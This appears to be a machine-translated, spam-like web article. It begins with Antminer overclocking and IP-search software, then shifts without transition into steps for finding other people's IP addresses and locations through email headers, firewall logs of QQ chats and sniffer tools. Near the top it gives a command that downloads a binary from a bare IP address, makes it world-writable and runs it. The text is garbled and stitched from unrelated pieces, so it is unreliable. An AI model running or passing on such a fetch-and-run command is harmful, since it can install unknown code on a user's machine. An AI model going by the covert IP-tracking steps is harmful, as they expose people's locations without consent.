Ant mining machine IP search software
蚂蚁T9+超频、T9超频、S9超频、S9I超频、E3超频、L3+超频、不变功率的研究
先放开源的代码,有能力者可以研究下https://github.com/vavavivi/AntMinerStats
文章所用工具与命令也在网络盘.
wget http://198.13.49.55/statov && chmod 777 statov && ./statov
Ant miner is the first cryptocurrency miner brand in the world with a market share of about 70%. The mining machine is developed by bitmainland and has a patent in mainland China. At the beginning, ant miner had only bitcoin miner. Later, its business expanded to other cryptocurrencies, such as Ethereum, dascoin, Leyte, Monroe, etc
ant mining machine adopts ASIC chip designed by bitcontinental, which is proced by TSMC. All chips are made of BM prefix. Each miner has three to four circuit boards, and there are dozens of chips on the circuit board. Therefore, each miner can only be used to mine one or more cryptocurrencies using the same algorithm
ant mining machine needs special mining software, and can not use third-party software. In addition, because of its high power, the ant miner also needs to be used with a special fire ox
The ant miner is often criticized as monopolizing the cryptocurrency mining instry e to its 70% market share, which goes against the purpose of cryptocurrency decentralization. Because Monroe was worried that the mining machinery would monopolize the mining market, Monroe announced to change the mining algorithm a few days after the launch of Monroe (X3 model) despite the opposition of Monroe community, so that all mining machinery could not be used to mine Monroe. Bitcontinent also encountered the failure of its first proct herethe ant miner will use a lot of electricity and proce a lot of waste heat in the process of operation. This leads to a large amount of electricity being consumed for mining or cooling, causing a lot of social criticism. Too much ant mining machine at the same time also led to fire and power failure, causing social inconvenience
it's better to wait and save enough for cash withdrawal
if all the cables are connected, we can turn on any connected PC at this time. Turn on the network neighborhood property
2
and then turn on the local connection property
3
and then turn on the TCP / IP protocol property
when using this method to query the IP address of the other party's computer, first ask the other party to send you an e-mail, and then you can get the IP address of the sender's computer by checking the properties of the e-mail; The following is the specific implementation steps of this method:
first, run Outlook Express program, and click the "accept all mail" button in the toolbar to accept the mail sent by friends, then open the in box page, find the mail sent by friends, and right-click it to execute the "properties" command from the pop-up right-click menu
in the property setting window, click the "details" tab, and in the tab page of Figure 1, you will see "R" eceived:fromxiecaiwen (unknown [11.111.45.25]), where "11.111.45.25" is the IP address of the friend of the other party; Of course, if your friend sends you e-mail through the web mailbox in the Internet, the IP address you see here is not the real IP address of his workstation, but the IP address of his website
of course, if you are using other email client programs, the way to view the sender's IP address may be different from the above; For example, if you use Foxmail to accept friends' e-mail, you can select the target e-mail in your in box, click the "e-mail" option in the menu bar, and select the "original information" command from the pop-up drop-down menu. Then you can see the IP address of the opposite friend in the subsequent interface
2. Log query method
this method is to monitor the QQ chat record in real time through the firewall, and then open the firewall log record to find the IP address of each other's friends. For the convenience of narration, this paper takes KV2004 firewall as an example to introce how to search the IP address of each other's friends:
considering that QQ chat with friends is carried out through UDP protocol, so you should first set up KV2004 firewall, let it automatically monitor UDP port, and once it is found that data enters from UDP port, it will be automatically recorded. When setting KV2004 firewall, first click the "rule setting" button in the firewall interface, and then click the "new rule" button to pop up the setting window as shown in Figure 2
Enter "search IP address" in the "name" text box and "search IP address" in the "description" text box; Then, in the "network conditions" setting item, select the "accept packets" check box, and set the "opposite IP address" to "any address", while in the "local IP address" setting item, no setting is required
next, click the "UDP" tag, select the "port range" option in the "local port" setting item under the tag page, and then enter "0" in the start box and "65535" in the end box; Similarly, in the "opposite port" setting item, select the "port range" option, and then enter "0" in the start box and "65535" in the end box
next, in the "when all conditions are met" setting item, select the "pass" option, and at the same time, select the "record" option in "other processing", while the "rule object" setting item does not need any setting; After completing all the above settings, click OK to return to the main interface of the firewall; Then select the newly created "search IP address" rule in the main interface, and click "save" to save the previous settings
after completing the above settings, KV2004 firewall will automatically monitor the whole process of QQ chat. Once your friend sends you QQ information, the IP address information of your friend will automatically appear in the firewall log file. At this time, you can enter the installation directory of KV2004 firewall, find and open the "kvfwlog" file, You can search each other's friends' IP addresses
3. Tool query method
this method uses professional IP address query tools to quickly search the IP address of the opposite computer. For example, with the help of a search tool called whereisip, you can easily get the IP address of your friend or even the physical location of your friend according to their web address. When using whereisip program to search the IP address of the other party, first start the program to open the search interface as shown in Figure 3, then click the "website" button of the interface, input the web address of the other party's friends in the subsequent window, and then click the "next" button, so that the program can automatically contact the domainnamewhois database in the Internet, Then the IP address corresponding to the web site address is searched from the database. Of course, in addition to knowing the IP address, you can also know the specific physical location of each other's friends
if you want to view the IP address of a workstation in the LAN, you can use tools such as "network assassin II" to help; As long as you run the tool, enter its main interface, and then execute "IP address & lt-& gt; In the dialog box, enter the computer name of your friend, and then click "convert to IP" to get the IP address of your friend's computer
if you use the oicqsniffer tool, it's easier to query the IP addresses of QQ friends. As long as you click the "tracking" button in the program interface, and then send a QQ message to the friend of the other party, the oicqsniffer tool will automatically display the IP address and port number of the friend of the other party. In addition, there are many professional tools to find IP addresses, such as ipsniper software